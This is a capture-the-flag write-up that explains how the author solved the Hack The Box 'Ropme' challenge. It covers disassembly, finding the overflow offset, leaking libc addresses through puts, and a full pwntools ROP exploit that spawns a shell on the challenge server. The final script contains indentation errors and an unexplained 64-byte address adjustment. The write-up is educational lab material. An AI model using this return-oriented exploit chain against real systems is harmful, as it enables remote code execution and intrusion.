Hack The Box / Challenges / Pwn / Ropme

This is going to be my first ROP type of challenge writeup. Sorry for the verbose level.

Downloading the binary and disassembling it:

gef➤  uf main
Dump of assembler code for function main:
   0x0000000000400626 <+0>:   push   rbp                      <-- esp = sp0 - 8
   0x0000000000400627 <+1>:   mov    rbp,rsp                  <-- rbp = sp0 - 8 
   0x000000000040062a <+4>:   sub    rsp,0x50                 <-- esp = sp0 - 8 - 80
   0x000000000040062e <+8>:   mov    DWORD PTR [rbp-0x44],edi
   0x0000000000400631 <+11>:  mov    QWORD PTR [rbp-0x50],rsi
   0x0000000000400635 <+15>:  mov    edi,0x4006f8
   0x000000000040063a <+20>:  call   0x4004e0 <puts@plt>
   0x000000000040063f <+25>:  mov    rax,QWORD PTR [rip+0x200a0a]        # 0x601050 <stdout@@GLIBC_2.2.5>
   0x0000000000400646 <+32>:  mov    rdi,rax
   0x0000000000400649 <+35>:  call   0x400510 <fflush@plt>
   0x000000000040064e <+40>:  mov    rdx,QWORD PTR [rip+0x200a0b]        # 0x601060 <stdin@@GLIBC_2.2.5>
   0x0000000000400655 <+47>:  lea    rax,[rbp-0x40]           <-- rax = (sp0 - 8) - 64 = sp0 - 72
   0x0000000000400659 <+51>:  mov    esi,0x1f4
   0x000000000040065e <+56>:  mov    rdi,rax                  <-- rdi = rax = sp0 - 72
   0x0000000000400661 <+59>:  call   0x400500 <fgets@plt>     
   0x0000000000400666 <+64>:  mov    eax,0x0
   0x000000000040066b <+69>:  leave                           <-- mov rsp,rbp ; pop rbp  
   0x000000000040066c <+70>:  ret    
End of assembler dump.

The assembly code is simple enough for manual analysis, the ret instruction return address is stored at offset of 72 bytes.

We can confirm with the following payload:

$ python -c "print('a' * 72 + 'b' * 8)"

And running gdb/gef:

$ gdb ./ropme 
...
gef➤  run
Starting program: /home/ropme/ropme 
ROP me outside, how 'about dah?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb

Program received signal SIGSEGV, Segmentation fault.
...
 →   0x40066c <main+70>        ret    
 [!] Cannot disassemble from $PC
 ────────────────────────────────────────────────────────────── threads ────
 [#0] Id 1, Name: "ropme", stopped 0x40066c in main (), reason: SIGSEGV
 ──────────────────────────────────────────────────────────────── trace ────
 [#0] 0x40066c → main()
 ───────────────────────────────────────────────────────────────────────────
 0x000000000040066c in main ()

It tried to return to a bad address, let's confirm it is the one expected in the payload:

gef➤  dq $rsp l2
0x00007fffffffe408│+0x0000   0x6262626262626262   
0x00007fffffffe410│+0x0008   0x000000000004000a

Confirmed. Now this is a ROP challenge so it is expected that the stack is not executable, forbidding us to use a simpler buffer overflow exploit:

gef➤  checksec
[+] checksec for '/home/ropme/ropme'
Canary                        : ✘ 
NX                            : ✓    <----- stack pages non-executable
PIE                           : ✘ 
Fortify                       : ✘ 
RelRO                         : Partial

The short explanation is that we're going to use "gadgets" which are pieces of code we want to execute to perform a specific instruction. These gadgets are located in executable pages of the binary in memory, this includes: imported libraries, the code segment, etc.

In the end I assume we need to get a shell and that all TCP inbound is being forwarded to the program stdin, and the program stdout is being forwarded to the TCP outbound. A common shellcode used in buffer overflow exploits is something like:

mov edx,0
mov esi,0
lea rdi, ... pointer to "/bin/sh"
call execve

However, using execve requires us to pass three arguments, if we used system() instead, the code would look like this:

lea rdi, ... pointer to "/bin/sh"
xor eax, eax
sub rsp, 8    <-- due to calling convention?, might not be necessary
call system

As can be seen in the manpages, the system function handles IO redirection, forking and makes the call to execl:

execl("/bin/sh", "sh", "-c", command, (char *) 0);

For this to happen the string /bin/sh needs to exist in libc code, for that reason it is used in ROP payloads. With this information we could think of a potential payload:

0                        56                              64                     72
< ... filler bytes ... >  < address of "pop rdi, ret" >  < "/bin/sh" address >  < address of system >

However we've three addresses here:

system       0x00007ffff7a79480 <- inside libc6
"/bin/sh"    0x00007ffff7b9bc19 <- inside libc6
pop rdi;ret  0x00000000004006d3 <- inside ropme binary space

..but we don't know the address of libc6 system function and the /bin/sh string, this depends on the libc binary version, it is not a static address across all libc versions.

To overcome this problem we first need to know which libc6 version is being used. One hint for the libc6 version can actually be found in the binary comment section:

$ readelf ropme --string-dump=27

String dump of section '.comment':
  [     0]  GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609

It seems the binary was built in a Ubuntu 16.04.4 and we can find more information about the gcc package in:

https://launchpad.net/ubuntu/xenial/amd64/gcc-5/5.4.0-6ubuntu1~16.04.4

This seems to be the exact match of the gcc package. It depends on libc6 version >= 2.15 which if we open the link leads to:

https://launchpad.net/ubuntu/xenial/amd64/libc6

This page contains all libc6 versions available for this Ubuntu version, they are all from two major versions of libc6: 2.21-0ubuntuX and 2.23-0ubuntuX. This narrows down further our search, however there is a faster, more common way of solving this problem: using the location of a single or more functions and compare with existing built library versions.

We know that three functions are imported in ropme: puts, fgets and fflush. The idea is to call puts to print the address of puts function. Our ROP chain would look like:

< filler bytes > < pop rdi > < puts func GOT > < puts >

This results in:

puts 0x7f46623d5690

And plugging this in libc.blukat.me results in two matches:

First library with name libc6_2.23-0ubuntu10_amd64
Second library with name libc6_2.23-0ubuntu11_amd64

This is aligned with our results obtained previously, it is using version 2.23-0ubuntuX. We can try narrow the results by also retrieving other imported function location, however, trying with 2 additional functions led to the same result.

Now, having the libc6 version and binary, we can know the addresses of system function and the string /bin/sh present in the libc6 binary. The base address of libc6 is calculated using the found function address and subtracting the offset of the function from the local copy.

$ nm -D libc6_2.23-0ubuntu10_amd64.so  | fgrep "W puts"
000000000006f690 W puts

Then our table of symbols is updated:

             offset     v.addr.
puts        0006f690   0x7f425c62a690  (base = 0x7f425c62a690 - 0x0006f690 = 0x7F425C5BB000)
system      00045390   base + 00045390 = 0x7f425c600390  
"/bin/sh"   0018cd57   base + 0018cd57 = 0x7f425c747d57
pop rdi;ret            004006d3

Note, pop rdi; ret gadget can be found with a tool like ropper. In detail, we're searching for these opcodes in executable portions of the binary and then calculate the corresponding virtual address.

With this information we've all the information to build our final ROP chain payload:

0                 72           80           88
< filler bytes >   < pop rdi >  < /bin/sh >  < system >

In python:

def p64(sn):
    return bytes.fromhex(sn)[::-1]
lib_base = 0x7F425C5BB000
payload = bytes('a' * 72,encoding='utf8') + p64(hex(0x004006d3)) + p64(hex(lib_base + 0x0018cd57)) + p64(hex(lib_base + 00045390))

Now since for each run we might get a different base address for the libc6 library, it is important to keep the program running after we receive the puts function GOT bytes. For that, we can simply add a gadget to our ROP chain to call the main function again.

Instead of doing this in pure python code, we can use pwntools library to help us, after knowing in detail what we're doing! I've used the great template from hacktricks site, just simplified and fixed some stuff to work in my python version.

from __future__ import print_function
from pwn import * # Import pwntools

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")
p = remote('docker.hackthebox.eu',31894)
local_bin = "./ropme"
elf = ELF(local_bin)
rop = ROP(elf)

OFFSET = bytes("A"*72,encoding='utf8')
PUTS_PLT = elf.plt['puts'] 
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"

log.info("Function 'main' address: 0x%08x" % MAIN_PLT)
log.info("Function 'puts' plt address: 0x%08x" % PUTS_PLT)
log.info("Gadget 'pop rdi; ret' address: 0x%08x" % POP_RDI)

def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

#Send our rop-chain payload
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)

#Parse leaked address
received = p.recvline().strip()
receiveds = "".join(["%02x" % b for b in received])
log.info("Received: %s" % receiveds)
leak = u64(received.ljust(8, bytes("\x00",encoding='utf8')))
log.info("Leaked libc address,  "+func_name+": "+ hex(leak))

#If not libc yet, stop here
if libc != "":
    libc.address = leak - libc.symbols[func_name] #Save libc base
    log.info("libc base @ %s" % hex(libc.address))

return hex(leak)

get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()

# For some reason (alignment stuff?) our /bin/sh is off by 64 bytes, if that happens, we subtract 64 bytes.
BINSH = next(libc.search(bytes("/bin/sh",encoding='utf8'))) - 64
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)

rop2s = "".join(["%02x" % b for b in rop2])
log.info("rop2 is %s" % rop2s)

p.clean()
p.sendline(rop2)

# Interact with the shell #####
p.interactive() #Interact with the conenction

The output is:

$ python3 solve.py 
[*] '/home/ropme/libc6_2.23-0ubuntu10_amd64.so'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
[+] Opening connection to docker.hackthebox.eu on port 31894: Done
[*] '/home/ropme/ropme'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
[*] Loaded 14 cached gadgets for './ropme'
[*] Function 'main' address: 0x00400626
[*] Function 'puts' plt address: 0x004004e0
[*] Gadget 'pop rdi; ret' address: 0x004006d3
[*] puts GOT @ 0x601018
b"ROP me outside, how 'about dah?\n"
[*] Received: 9076a309727f
[*] Leaked libc address,  puts: 0x7f7209a37690
[*] libc base @ 0x7f72099c8000
[*] bin/sh 0x7f7209b54d17 
[*] system 0x7f7209a0d390 
[*] rop2 is 414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141d306400000000000174db509727f000090d3a009727f00003020a009727f0000
[*] Switching to interactive mode
$ cat flag.txt
HTB{r0p_m3_if_y0u_c4n!}
$

References:

https://www.slideshare.net/inaz2/rop-illmatic-exploring-universal-rop-on-glibc-x8664-en-41595384
https://book.hacktricks.xyz/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address